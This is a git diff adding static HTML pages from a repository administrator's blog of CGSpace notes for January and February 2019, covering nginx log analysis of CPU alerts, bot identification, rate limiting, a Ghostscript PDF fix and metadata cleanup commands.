+<li>Both of these were successful, so there must have been an update to ImageMagick or Ghostscript in Ubuntu since early 2018-12</li>
+<li>Looking at the apt history logs I see that on 2018-12-07 a security update for Ghostscript was installed (version 9.26~dfsg+0-0ubuntu0.16.04.3)</li>
+<li>I think this Launchpad discussion is relevant: <a href="https://bugs.launchpad.net/ubuntu/+source/ghostscript/+bug/1806517">https://bugs.launchpad.net/ubuntu/+source/ghostscript/+bug/1806517</a></li>
+<li>As well as the original Ghostscript bug report: <a href="https://bugs.ghostscript.com/show_bug.cgi?id=699815">https://bugs.ghostscript.com/show_bug.cgi?id=699815</a></li>
+</ul>
+<h2 id="2019-01-24">2019-01-24</h2>
+<ul>
+<li>I noticed Ubuntu&rsquo;s Ghostscript 9.26 works on some troublesome PDFs where Arch&rsquo;s Ghostscript 9.26 doesn&rsquo;t, so the fix for the first/last page crash is not the patch I found yesterday</li>
+<li>Ubuntu&rsquo;s Ghostscript uses another <a href="http://git.ghostscript.com/?p=ghostpdl.git;h=fae21f1668d2b44b18b84cf0923a1d5f3008a696">patch from Ghostscript git</a> (<a href="https://bugs.ghostscript.com/show_bug.cgi?id=700315">upstream bug report</a>)</li>
+<li>I re-compiled Arch&rsquo;s ghostscript with the patch and then I was able to generate a thumbnail from one of the <a href="https://cgspace.cgiar.org/handle/10568/98390">troublesome PDFs</a></li>
+<li>Before and after:</li>
+</ul>
+<pre tabindex="0"><code>$ identify Food\ safety\ Kenya\ fruits.pdf\[0\]
+zsh: abort (core dumped)  identify Food\ safety\ Kenya\ fruits.pdf\[0\]
+$ identify Food\ safety\ Kenya\ fruits.pdf\[0\]
+Food safety Kenya fruits.pdf[0]=&gt;Food safety Kenya fruits.pdf PDF 612x792 612x792+0+0 16-bit sRGB 64626B 0.000u 0:00.000
+identify: CorruptImageProfile `xmp&#39; @ warning/profile.c/SetImageProfileInternal/1747.
+</code></pre><ul>
+<li>I reported it to the Arch Linux bug tracker (<a href="https://bugs.archlinux.org/task/61513">61513</a>)</li>
+<li>I told Atmire to go ahead with the Metadata Quality Module addition based on our <code>5_x-dev</code> branch (<a href="https://tracker.atmire.com/tickets-cgiar-ilri/view-ticket?id=657">657</a>)</li>
+<li>Linode sent alerts last night to say that CGSpace (linode18) was using high CPU last night, here are the top ten IPs from the nginx logs around that time:</li>
+</ul>
+<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;23/Jan/2019:(18|19|20)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
+    305 3.81.136.184
+    306 3.83.14.11
+    306 52.54.252.47
+    325 54.221.57.180
+    378 66.249.64.157
+    424 54.70.40.11
+    497 47.29.247.74
+    783 35.237.175.180
+   1108 66.249.64.155
+   2378 45.5.186.2
+</code></pre><ul>
+<li>45.5.186.2 is CIAT and 66.249.64.155 is Google&hellip; hmmm.</li>
+<li>Linode sent another alert this morning, here are the top ten IPs active during that time:</li>
+</ul>
+<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;24/Jan/2019:0(4|5|6)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
+    360 3.89.134.93
+    362 34.230.15.139
+    366 100.24.48.177
+    369 18.212.208.240
+    377 3.81.136.184
+    404 54.221.57.180
+    506 66.249.64.155
+   4642 70.32.83.92
+   4643 205.186.128.185
+   8593 45.5.186.2
+</code></pre><ul>
+<li>Just double checking what CIAT is doing, they are mainly hitting the REST API:</li>
+</ul>
+<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;24/Jan/2019:&#34; | grep 45.5.186.2 | grep -Eo &#34;GET /(handle|bitstream|rest|oai)/&#34; | sort | uniq -c | sort -n
+</code></pre><ul>
+<li>CIAT&rsquo;s community currently has 12,000 items in it so this is normal</li>
+<li>The issue with goo.gl links that we saw yesterday appears to be resolved, as links are working again&hellip;</li>
+<li>For example: <a href="https://goo.gl/fb/VRj9Gq">https://goo.gl/fb/VRj9Gq</a></li>
+<li>The full <a href="http://id.loc.gov/vocabulary/relators.html">list of MARC Relators on the Library of Congress website</a> linked from the <a href="http://dublincore.org/usage/documents/relators/">DMCI relators page</a> is very confusing</li>
+<li>Looking at the default DSpace XMLUI crosswalk in <a href="https://github.com/DSpace/DSpace/blob/dspace-5_x/dspace/config/crosswalks/xhtml-head-item.properties">xhtml-head-item.properties</a> I see a very complete mapping of DSpace DC and QDC fields to DCTERMS
+<ul>
+<li>This is good for standards-compliant web crawlers, but what about for those harvesting via REST or OAI APIs?</li>
+</ul>
+</li>
+<li>I sent a message titled &ldquo;<a href="https://groups.google.com/forum/#!topic/dspace-tech/phV_t51TGuE">DC, QDC, and DCTERMS: reviewing our metadata practices</a>&rdquo; to the dspace-tech mailing list to ask about some of this</li>
+</ul>
+<h2 id="2019-01-25">2019-01-25</h2>
+<ul>
+<li>A little bit more work on getting Tomcat to run from a tarball on our <a href="https://github.com/ilri/rmg-ansible-public">Ansible infrastructure playbooks</a>
+<ul>
+<li>I tested by doing a Tomcat 7.0.91 installation, then switching it to 7.0.92 and it worked&hellip; nice!</li>
+<li>I refined the tasks so much that I was confident enough to deploy them on DSpace Test and it went very well</li>
+<li>Basically I just stopped tomcat7, created a dspace user, removed tomcat7, chown&rsquo;d everything to the dspace user, then ran the playbook</li>
+<li>So now DSpace Test (linode19) is running Tomcat 7.0.92&hellip; w00t</li>
+<li>Now we need to monitor it for a few weeks to see if there is anything we missed, and then I can change CGSpace (linode18) as well, and we&rsquo;re ready for Ubuntu 18.04 too!</li>
+</ul>
+</li>
+</ul>
+<h2 id="2019-01-27">2019-01-27</h2>
+<ul>
+<li>Linode sent an email that the server was using a lot of CPU this morning, and these were the top IPs in the web server logs at the time:</li>
+</ul>
+<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;27/Jan/2019:0(6|7|8)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
+    189 40.77.167.108
+    191 157.55.39.2
+    263 34.218.226.147
+    283 45.5.184.2
+    332 45.5.184.72
+    608 5.9.6.51
+    679 66.249.66.223
+   1116 66.249.66.219
+   4644 205.186.128.185
+   4644 70.32.83.92
+</code></pre><ul>
+<li>I think it&rsquo;s the usual IPs:
+<ul>
+<li>70.32.83.92 is CCAFS</li>
+<li>205.186.128.185 is CCAFS or perhaps another Macaroni Bros harvester (new ILRI website?)</li>
+</ul>
+</li>
+</ul>
+<h2 id="2019-01-28">2019-01-28</h2>
+<ul>
+<li>Udana from WLE asked me about the interaction between their publication website and their items on CGSpace
+<ul>
+<li>There is an item that is mapped into their collection from IWMI and is missing their <code>cg.identifier.wletheme</code> metadata</li>
+<li>I told him that, as far as I remember, when WLE introduced Phase II research themes in 2017 we decided to infer theme ownership from the collection hierarchy and we created a <a href="https://cgspace.cgiar.org/handle/10568/81268">WLE Phase II Research Themes</a> subCommunity</li>
+<li>Perhaps they need to ask Macaroni Bros about the mapping</li>
+</ul>
+</li>
+<li>Linode alerted that CGSpace (linode18) was using too much CPU again this morning, here are the active IPs from the web server log at the time:</li>
+</ul>
+<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;28/Jan/2019:0(6|7|8)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
+     67 207.46.13.50
+    105 41.204.190.40
+    117 34.218.226.147
+    126 35.237.175.180
+    203 213.55.99.121
+    332 45.5.184.72
+    377 5.9.6.51
+    512 45.5.184.2
+   4644 205.186.128.185
+   4644 70.32.83.92
+</code></pre><ul>
+<li>There seems to be a pattern with <code>70.32.83.92</code> and <code>205.186.128.185</code> lately!</li>
+<li>Every morning at 8AM they are the top users&hellip; I should tell them to stagger their requests&hellip;</li>
+<li>I signed up for a <a href="https://visualping.io/">VisualPing</a> of the <a href="https://jdbc.postgresql.org/download.html">PostgreSQL JDBC driver download page</a> to my CGIAR email address
+<ul>
+<li>Hopefully this will one day alert me that a new driver is released!</li>
+</ul>
+</li>
+<li>Last night Linode sent an alert that CGSpace (linode18) was using high CPU, here are the most active IPs in the hours just before, during, and after the alert:</li>
+</ul>
+<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;28/Jan/2019:(17|18|19|20|21)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
+    310 45.5.184.2
+    425 5.143.231.39
+    526 54.70.40.11
+   1003 199.47.87.141
+   1374 35.237.175.180
+   1455 5.9.6.51
+   1501 66.249.66.223
+   1771 66.249.66.219
+   2107 199.47.87.140
+   2540 45.5.186.2
+</code></pre><ul>
+<li>Of course there is CIAT&rsquo;s <code>45.5.186.2</code>, but also <code>45.5.184.2</code> appears to be CIAT&hellip; I wonder why they have two harvesters?</li>
+<li><code>199.47.87.140</code> and <code>199.47.87.141</code> is TurnItIn with the following user agent:</li>
+</ul>
+<pre tabindex="0"><code>TurnitinBot (https://turnitin.com/robot/crawlerinfo.html)
+</code></pre><h2 id="2019-01-29">2019-01-29</h2>
+<ul>
+<li>Linode sent an alert about CGSpace (linode18) CPU usage this morning, here are the top IPs in the web server logs just before, during, and after the alert:</li>
+</ul>
+<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;29/Jan/2019:0(3|4|5|6|7)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
+    334 45.5.184.72
+    429 66.249.66.223
+    522 35.237.175.180
+    555 34.218.226.147
+    655 66.249.66.221
+    844 5.9.6.51
+   2507 66.249.66.219
+   4645 70.32.83.92
+   4646 205.186.128.185
+   9329 45.5.186.2
+</code></pre><ul>
+<li><code>45.5.186.2</code> is CIAT as usual&hellip;</li>
+<li><code>70.32.83.92</code> and <code>205.186.128.185</code> are CCAFS as usual&hellip;</li>
+<li><code>66.249.66.219</code> is Google&hellip;</li>
+<li>I&rsquo;m thinking it might finally be time to increase the threshold of the Linode CPU alerts
+<ul>
+<li>I adjusted the alert threshold from 250% to 275%</li>
+</ul>
+</li>
+</ul>
+<h2 id="2019-01-30">2019-01-30</h2>
+<ul>
+<li>Got another alert from Linode about CGSpace (linode18) this morning, here are the top IPs before, during, and after the alert:</li>
+</ul>
+<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;30/Jan/2019:0(5|6|7|8|9)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
+    273 46.101.86.248
+    301 35.237.175.180
+    334 45.5.184.72
+    387 5.9.6.51
+    527 2a01:4f8:13b:1296::2
+   1021 34.218.226.147
+   1448 66.249.66.219
+   4649 205.186.128.185
+   4649 70.32.83.92
+   5163 45.5.184.2
+</code></pre><ul>
+<li>I might need to adjust the threshold again, because the load average this morning was 296% and the activity looks pretty normal (as always recently)</li>
+</ul>
+<h2 id="2019-01-31">2019-01-31</h2>
+<ul>
+<li>Linode sent alerts about CGSpace (linode18) last night and this morning, here are the top IPs before, during, and after those times:</li>
+</ul>
+<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;30/Jan/2019:(16|17|18|19|20)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
+    436 18.196.196.108
+    460 157.55.39.168
+    460 207.46.13.96
+    500 197.156.105.116
+    728 54.70.40.11
+   1560 5.9.6.51
+   1562 35.237.175.180
+   1601 85.25.237.71
+   1894 66.249.66.219
+   2610 45.5.184.2
+# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;31/Jan/2019:0(2|3|4|5|6)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
+    318 207.46.13.242
+    334 45.5.184.72
+    486 35.237.175.180
+    609 34.218.226.147
+    620 66.249.66.219
+   1054 5.9.6.51
+   4391 70.32.83.92
+   4428 205.186.128.185
+   6758 85.25.237.71
+   9239 45.5.186.2
+</code></pre><ul>
+<li><code>45.5.186.2</code> and <code>45.5.184.2</code> are CIAT as always</li>
+<li><code>85.25.237.71</code> is some new server in Germany that I&rsquo;ve never seen before with the user agent:</li>
+</ul>
+<pre tabindex="0"><code>Linguee Bot (http://www.linguee.com/bot; bot@linguee.com)
+</code></pre><!-- raw HTML omitted -->
+
+  
+
+  
+
+</article> 
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/2019-02/index.html b/docs/2019-02/index.html
new file mode 100644
index 000000000..0bf90c4db
--- /dev/null
+++ b/docs/2019-02/index.html
@@ -0,0 +1,1398 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="February, 2019" />
+<meta property="og:description" content="2019-02-01
+
+Linode has alerted a few times since last night that the CPU usage on CGSpace (linode18) was high despite me increasing the alert threshold last week from 250% to 275%—I might need to increase it again!
+The top IPs before, during, and after this latest alert tonight were:
+
+# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;01/Feb/2019:(17|18|19|20|21)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
+    245 207.46.13.5
+    332 54.70.40.11
+    385 5.143.231.38
+    405 207.46.13.173
+    405 207.46.13.75
+   1117 66.249.66.219
+   1121 35.237.175.180
+   1546 5.9.6.51
+   2474 45.5.186.2
+   5490 85.25.237.71
+
+85.25.237.71 is the &ldquo;Linguee Bot&rdquo; that I first saw last month
+The Solr statistics the past few months have been very high and I was wondering if the web server logs also showed an increase
+There were just over 3 million accesses in the nginx logs last month:
+
+# time zcat --force /var/log/nginx/* | grep -cE &#34;[0-9]{1,2}/Jan/2019&#34;
+3018243
+
+real    0m19.873s
+user    0m22.203s
+sys     0m1.979s
+" />
+<meta property="og:type" content="article" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2019-02/" />
+<meta property="article:published_time" content="2019-02-01T21:37:30+02:00" />
+<meta property="article:modified_time" content="2019-10-28T13:39:25+02:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="February, 2019"/>
+<meta name="twitter:description" content="2019-02-01
+
+Linode has alerted a few times since last night that the CPU usage on CGSpace (linode18) was high despite me increasing the alert threshold last week from 250% to 275%—I might need to increase it again!
+The top IPs before, during, and after this latest alert tonight were:
+
+# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;01/Feb/2019:(17|18|19|20|21)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
+    245 207.46.13.5
+    332 54.70.40.11
+    385 5.143.231.38
+    405 207.46.13.173
+    405 207.46.13.75
+   1117 66.249.66.219
+   1121 35.237.175.180
+   1546 5.9.6.51
+   2474 45.5.186.2
+   5490 85.25.237.71
+
+85.25.237.71 is the &ldquo;Linguee Bot&rdquo; that I first saw last month
+The Solr statistics the past few months have been very high and I was wondering if the web server logs also showed an increase
+There were just over 3 million accesses in the nginx logs last month:
+
+# time zcat --force /var/log/nginx/* | grep -cE &#34;[0-9]{1,2}/Jan/2019&#34;
+3018243
+
+real    0m19.873s
+user    0m22.203s
+sys     0m1.979s
+"/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+<script type="application/ld+json">
+{
+  "@context": "http://schema.org",
+  "@type": "BlogPosting",
+  "headline": "February, 2019",
+  "url": "https://alanorth.github.io/cgspace-notes/2019-02/",
+  "wordCount": "7700",
+  "datePublished": "2019-02-01T21:37:30+02:00",
+  "dateModified": "2019-10-28T13:39:25+02:00",
+  "author": {
+    "@type": "Person",
+    "name": "Alan Orth"
+  },
+  "keywords": "Notes"
+}
+</script>
+
+
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/2019-02/">
+
+    <title>February, 2019 | CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link " href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2019-02/">February, 2019</a></h2>
+    <p class="blog-post-meta">
+<time datetime="2019-02-01T21:37:30+02:00">Fri Feb 01, 2019</time>
+ in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2019-02-01">2019-02-01</h2>
+<ul>
+<li>Linode has alerted a few times since last night that the CPU usage on CGSpace (linode18) was high despite me increasing the alert threshold last week from 250% to 275%—I might need to increase it again!</li>
+<li>The top IPs before, during, and after this latest alert tonight were:</li>
+</ul>
+<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;01/Feb/2019:(17|18|19|20|21)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
+    245 207.46.13.5
+    332 54.70.40.11
+    385 5.143.231.38
+    405 207.46.13.173
+    405 207.46.13.75
+   1117 66.249.66.219
+   1121 35.237.175.180
+   1546 5.9.6.51
+   2474 45.5.186.2
+   5490 85.25.237.71
+</code></pre><ul>
+<li><code>85.25.237.71</code> is the &ldquo;Linguee Bot&rdquo; that I first saw last month</li>
+<li>The Solr statistics the past few months have been very high and I was wondering if the web server logs also showed an increase</li>
+<li>There were just over 3 million accesses in the nginx logs last month:</li>
+</ul>
+<pre tabindex="0"><code># time zcat --force /var/log/nginx/* | grep -cE &#34;[0-9]{1,2}/Jan/2019&#34;
+3018243
+
+real    0m19.873s
+user    0m22.203s
+sys     0m1.979s
+</code></pre><ul>
+<li>Normally I&rsquo;d say this was very high, but <a href="/cgspace-notes/2018-02/">about this time last year</a> I remember thinking the same thing when we had 3.1 million&hellip;</li>
+<li>I will have to keep an eye on this to see if there is some error in Solr&hellip;</li>
+<li>Atmire sent their <a href="https://github.com/ilri/DSpace/pull/407">pull request to re-enable the Metadata Quality Module (MQM) on our <code>5_x-dev</code> branch</a> today
+<ul>
+<li>I will test it next week and send them feedback</li>
+</ul>
+</li>
+</ul>
+<h2 id="2019-02-02">2019-02-02</h2>
+<ul>
+<li>Another alert from Linode about CGSpace (linode18) this morning, here are the top IPs in the web server logs before, during, and after that time:</li>
+</ul>
+<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;02/Feb/2019:0(1|2|3|4|5)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
+    284 18.195.78.144
+    329 207.46.13.32
+    417 35.237.175.180
+    448 34.218.226.147
+    694 2a01:4f8:13b:1296::2
+    718 2a01:4f8:140:3192::2
+    786 137.108.70.14
+   1002 5.9.6.51
+   6077 85.25.237.71
+   8726 45.5.184.2
+</code></pre><ul>
+<li><code>45.5.184.2</code> is CIAT and <code>85.25.237.71</code> is the new Linguee bot that I first noticed a few days ago</li>
+<li>I will increase the Linode alert threshold from 275 to 300% because this is becoming too much!</li>
+<li>I tested the Atmire Metadata Quality Module (MQM)&rsquo;s duplicate checked on the some <a href="https://dspacetest.cgiar.org/handle/10568/81268">WLE items</a> that I helped Udana with a few months ago on DSpace Test (linode19) and indeed it found many duplicates!</li>
+</ul>
+<h2 id="2019-02-03">2019-02-03</h2>
+<ul>
+<li>This is seriously getting annoying, Linode sent another alert this morning that CGSpace (linode18) load was 377%!</li>
+<li>Here are the top IPs before, during, and after that time:</li>
+</ul>
+<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;03/Feb/2019:0(5|6|7|8|9)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
+    325 85.25.237.71
+    340 45.5.184.72
+    431 5.143.231.8
+    756 5.9.6.51
+   1048 34.218.226.147
+   1203 66.249.66.219
+   1496 195.201.104.240
+   4658 205.186.128.185
+   4658 70.32.83.92
+   4852 45.5.184.2
+</code></pre><ul>
+<li><code>45.5.184.2</code> is CIAT, <code>70.32.83.92</code> and <code>205.186.128.185</code> are Macaroni Bros harvesters for CCAFS I think</li>
+<li><code>195.201.104.240</code> is a new IP address in Germany with the following user agent:</li>
+</ul>
+<pre tabindex="0"><code>Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:62.0) Gecko/20100101 Firefox/62.0
+</code></pre><ul>
+<li>This user was making 20–60 requests per minute this morning&hellip; seems like I should try to block this type of behavior heuristically, regardless of user agent!</li>
+</ul>
+<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;03/Feb/2019&#34; | grep 195.201.104.240 | grep -o -E &#39;03/Feb/2019:0[0-9]:[0-9][0-9]&#39; | uniq -c | sort -n | tail -n 20
+     19 03/Feb/2019:07:42
+     20 03/Feb/2019:07:12
+     21 03/Feb/2019:07:27
+     21 03/Feb/2019:07:28
+     25 03/Feb/2019:07:23
+     25 03/Feb/2019:07:29
+     26 03/Feb/2019:07:33
+     28 03/Feb/2019:07:38
+     30 03/Feb/2019:07:31
+     33 03/Feb/2019:07:35
+     33 03/Feb/2019:07:37
+     38 03/Feb/2019:07:40
+     43 03/Feb/2019:07:24
+     43 03/Feb/2019:07:32
+     46 03/Feb/2019:07:36
+     47 03/Feb/2019:07:34
+     47 03/Feb/2019:07:39
+     47 03/Feb/2019:07:41
+     51 03/Feb/2019:07:26
+     59 03/Feb/2019:07:25
+</code></pre><ul>
+<li>At least they re-used their Tomcat session!</li>
+</ul>
+<pre tabindex="0"><code>$ grep -o -E &#39;session_id=[A-Z0-9]{32}:ip_addr=195.201.104.240&#39; dspace.log.2019-02-03 | sort | uniq | wc -l
+1
+</code></pre><ul>
+<li>This user was making requests to <code>/browse</code>, which is not currently under the existing rate limiting of dynamic pages in our nginx config
+<ul>
+<li>I <a href="https://github.com/ilri/rmg-ansible-public/commit/36dfb072d6724fb5cdc81ef79cab08ed9ce427ad">extended the existing <code>dynamicpages</code> (12/m) rate limit to <code>/browse</code> and <code>/discover</code></a> with an allowance for bursting of up to five requests for &ldquo;real&rdquo; users</li>
+</ul>
+</li>
+<li>Run all system updates on linode20 and reboot it
+<ul>
+<li>This will be the new AReS repository explorer server soon</li>
+</ul>
+</li>
+</ul>
+<h2 id="2019-02-04">2019-02-04</h2>
+<ul>
+<li>Generate a list of CTA subjects from CGSpace for Peter:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# \copy (SELECT DISTINCT text_value, count(*) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=124 GROUP BY text_value ORDER BY COUNT DESC) to /tmp/cta-subjects.csv with csv header;
+COPY 321
+</code></pre><ul>
+<li>Skype with Michael Victor about CKM and CGSpace</li>
+<li>Discuss the new IITA research theme field with Abenet and decide that we should use <code>cg.identifier.iitatheme</code></li>
+<li>This morning there was another alert from Linode about the high load on CGSpace (linode18), here are the top IPs in the web server logs before, during, and after that time:</li>
+</ul>
+<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;04/Feb/2019:0(5|6|7|8|9)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
+    589 2a01:4f8:140:3192::2
+    762 66.249.66.219
+    889 35.237.175.180
+   1332 34.218.226.147
+   1393 5.9.6.51
+   1940 50.116.102.77
+   3578 85.25.237.71
+   4311 45.5.184.2
+   4658 205.186.128.185
+   4658 70.32.83.92
+</code></pre><ul>
+<li>At this rate I think I just need to stop paying attention to these alerts—DSpace gets thrashed when people use the APIs properly and there&rsquo;s nothing we can do to improve REST API performance!</li>
+<li>Perhaps I just need to keep increasing the Linode alert threshold (currently 300%) for this host?</li>
+</ul>
+<h2 id="2019-02-05">2019-02-05</h2>
+<ul>
+<li>Peter sent me corrections and deletions for the CTA subjects and as usual, there were encoding errors with some accentsÁ in his file</li>
+<li>In other news, it seems that the GREL syntax regarding booleans changed in OpenRefine recently, so I need to update some expressions like the one I use to detect encoding errors to use <code>toString()</code>:</li>
+</ul>
+<pre tabindex="0"><code>or(
+  isNotNull(value.match(/.*\uFFFD.*/)),
+  isNotNull(value.match(/.*\u00A0.*/)),
+  isNotNull(value.match(/.*\u200A.*/)),
+  isNotNull(value.match(/.*\u2019.*/)),
+  isNotNull(value.match(/.*\u00b4.*/)),
+  isNotNull(value.match(/.*\u007e.*/))
+).toString()
+</code></pre><ul>
+<li>Testing the corrections for sixty-five items and sixteen deletions using my <a href="https://gist.github.com/alanorth/df92cbfb54d762ba21b28f7cd83b6897">fix-metadata-values.py</a> and <a href="https://gist.github.com/alanorth/bd7d58c947f686401a2b1fadc78736be">delete-metadata-values.py</a> scripts:</li>
+</ul>
+<pre tabindex="0"><code>$ ./fix-metadata-values.py -i 2019-02-04-Correct-65-CTA-Subjects.csv -f cg.subject.cta -t CORRECT -m 124 -db dspace -u dspace -p &#39;fuu&#39; -d
+$ ./delete-metadata-values.py -i 2019-02-04-Delete-16-CTA-Subjects.csv -f cg.subject.cta -m 124 -db dspace -u dspace -p &#39;fuu&#39; -d
+</code></pre><ul>
+<li>I applied them on DSpace Test and CGSpace and started a full Discovery re-index:</li>
+</ul>
+<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx1024m&#34;
+$ time schedtool -D -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
+</code></pre><ul>
+<li>Peter had marked several terms with <code>||</code> to indicate multiple values in his corrections so I will have to go back and do those manually:</li>
+</ul>
+<pre tabindex="0"><code>EMPODERAMENTO DE JOVENS,EMPODERAMENTO||JOVENS
+ENVIRONMENTAL PROTECTION AND NATURAL RESOURCES MANAGEMENT,NATURAL RESOURCES MANAGEMENT||ENVIRONMENT
+FISHERIES AND AQUACULTURE,FISHERIES||AQUACULTURE
+MARKETING AND TRADE,MARKETING||TRADE
+MARKETING ET COMMERCE,MARKETING||COMMERCE
+NATURAL RESOURCES AND ENVIRONMENT,NATURAL RESOURCES MANAGEMENT||ENVIRONMENT
+PÊCHES ET AQUACULTURE,PÊCHES||AQUACULTURE
+PESCAS E AQUACULTURE,PISCICULTURA||AQUACULTURE
+</code></pre><h2 id="2019-02-06">2019-02-06</h2>
+<ul>
+<li>I dumped the CTA community so I can try to fix the subjects with multiple subjects that Peter indicated in his corrections:</li>
+</ul>
+<pre tabindex="0"><code>$ dspace metadata-export -i 10568/42211 -f /tmp/cta.csv
+</code></pre><ul>
+<li>Then I used <code>csvcut</code> to get only the CTA subject columns:</li>
+</ul>
+<pre tabindex="0"><code>$ csvcut -c &#34;id,collection,cg.subject.cta,cg.subject.cta[],cg.subject.cta[en_US]&#34; /tmp/cta.csv &gt; /tmp/cta-subjects.csv
+</code></pre><ul>
+<li>After that I imported the CSV into OpenRefine where I could properly identify and edit the subjects as multiple values</li>
+<li>Then I imported it back into CGSpace:</li>
